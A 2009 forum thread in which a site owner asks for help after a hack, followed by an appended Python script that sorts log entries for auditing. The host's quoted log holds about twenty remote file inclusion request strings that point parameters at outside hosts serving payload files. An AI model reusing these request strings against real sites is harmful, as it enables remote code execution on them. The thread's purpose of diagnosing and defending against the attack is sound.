Site Hacked: Help Needed
Old 01-19-2009, 12:34 PM Site Hacked: Help Needed
Junior Talker

Posts: 1
Trades: 0
Hello,

The hosts suspended it because it was hacked and sending out spam. I hired someone on a freelance website to make the site. I don't have the skills to fix this myself.

Here is what the hosts said:
Quote:
We've had to suspend that account again. It looks like you have some php files that are vulnerable to cross-site scripting or remote file inclusion exploits, but we haven't been able to find the definite exact cause or file.

Because your site is attempting to flood our mail server with connections, we'll have to keep the site suspended 'till the issue is found.

Maybe the person who installed the site might be able to tell where the following log entries are being called from:
/?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/5/posts/2_Community/0/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg%20/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/%20%20/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//?path%5Bdocroot%5D=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/6/posts/19_Eating_Local/96_Fruit_Veg/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/96_Fruit_Veg/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/19_Eating_Local/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/6/posts/19_Eating_Local/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/6/posts/errors.php?error=http://i0.co.kr/i0mall//admin/idxx.txt??
/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???
/index.php?news_id=3&start=0&category...t_id=0&arcy ear=&arcmonth=//config.inc.php?path_escape=http://www.ptp.dk/typo3/typo3conf/ext/rtehtmlarea/htmlarea/plugins/RemoveFormat/robots.txt??
/index.php?news_id=3&start=0&category...t_id=0&arcy ear=&arcmonth=/config.inc.php?path_escape=http://www.samilglass.com/images/v6id.txt???

If you could ask them what PHP files are called when any of the above URLs are entered, it might help us track down the problem.

Last edited by pippy_doodle; 01-20-2009 at 12:45 PM..
Old 01-20-2009, 07:18 AM Re: Site Hacked: Help Needed
anderswc's Avatar
Super Talker

Posts: 132
Name: Will Anderson
Location: Terre Haute, IN
Trades: 0
Only looking at the log, it's really hard to tell what the problem with your site is. It DOES look like there might be some remote file inclusion here, which could be causing you problems.

Check with your original programmer to see what he/she has to say.
__________________
Will Anderson
It's An Anderson | Twitter | Anderson Web Solutions
Old 01-20-2009, 07:41 AM Re: Site Hacked: Help Needed
amw_drizz's Avatar
Ultra Talker

Posts: 338
Name: Jon
Location: New York
Trades: 0
If you know a little bit of PHP you can do this.

In your PHP file that calls the other files, put

PHP Code:
define("localOnly",True); 
Then in all of your included files

PHP Code:
// Stop if this file was requested directly instead of being included
if(defined("localOnly") !== True){
    echo "No direct access allowed";
    exit();
}

So when you include a file, it will check to see if var localOnly is defined; if it is, it will run, and if it isn't, it will exit. That should help against external inclusion, but I would suggest using a more creative name than what I provided.
__________________
AMW_Drizz
Dev Machine:: Apache 2.2.6 PHP 5.2.6 MySQL 5.1

Last edited by amw_drizz; 01-20-2009 at 07:43 AM..
Old 01-20-2009, 08:20 AM Re: Site Hacked: Help Needed
anderswc's Avatar
Super Talker

Posts: 132
Name: Will Anderson
Location: Terre Haute, IN
Trades: 0
The problem isn't with inclusion of local files from external sites, but with inclusion of external files from the local site. If you look at the addresses that are referenced in the log file, you'll see that they contain PHP code. It is most likely being included on your site, causing vulnerabilities (the code is also crap by the way!).

I seriously suggest talking to your programmer about these issues as he/she is the best one to address them.
__________________
Will Anderson
It's An Anderson | Twitter | Anderson Web Solutions
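
One way to answer the host's question from the log itself, added here as an example and not part of the original thread: group the logged requests by the script that served them and the parameter that carried a remote URL. The sample requests are constructed, `remote.example` is a placeholder host, and the function names are hypothetical; the parameter names are the ones in the host's log.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample requests shaped like the host's log entries;
# remote.example is a placeholder, not a host from the thread.
SAMPLE_REQUESTS = [
    "/?path%5Bdocroot%5D=http://remote.example/a.txt??",
    "/config.inc.php?path_escape=http://remote.example/b.txt???",
    "/6/posts/errors.php?error=http://remote.example/a.txt??",
    "/6/posts/19_Eating_Local/errors.php?error=http://remote.example/a.txt??",
    "/index.php?news_id=3&start=0",
    "/index.php?news_id=3&arcmonth=/config.inc.php"
    "?path_escape=http://remote.example/b.txt???",
]

# A parameter whose value begins with a remote URL: ?name=http://... or &name=ftp://...
PROBE = re.compile(r"[?&]([^=&?]+)=(?:https?|ftp)://", re.IGNORECASE)


def classify(request):
    """Return (script that served the request, probed parameter), or None."""
    decoded = unquote(request)  # %5B/%5D become [ and ]
    match = PROBE.search(decoded)
    if match is None:
        return None  # ordinary request, no remote URL passed as a value
    path = decoded.split("?", 1)[0]  # everything before the first "?"
    script = path.rsplit("/", 1)[-1] or "(directory index)"
    return script, match.group(1)


def audit_targets(requests):
    """Count probes per (script, parameter) pair to get the list to audit."""
    counts = Counter()
    for request in requests:
        hit = classify(request)
        if hit:
            counts[hit] += 1
    return counts


if __name__ == "__main__":
    for (script, param), n in audit_targets(SAMPLE_REQUESTS).most_common():
        print(f"{n:3d}  {script:20s} {param}")
```

Each reported parameter name is something to search for in the site's `include` and `require` statements; a request-supplied value reaching one of those is what would allow the remote file to be pulled in.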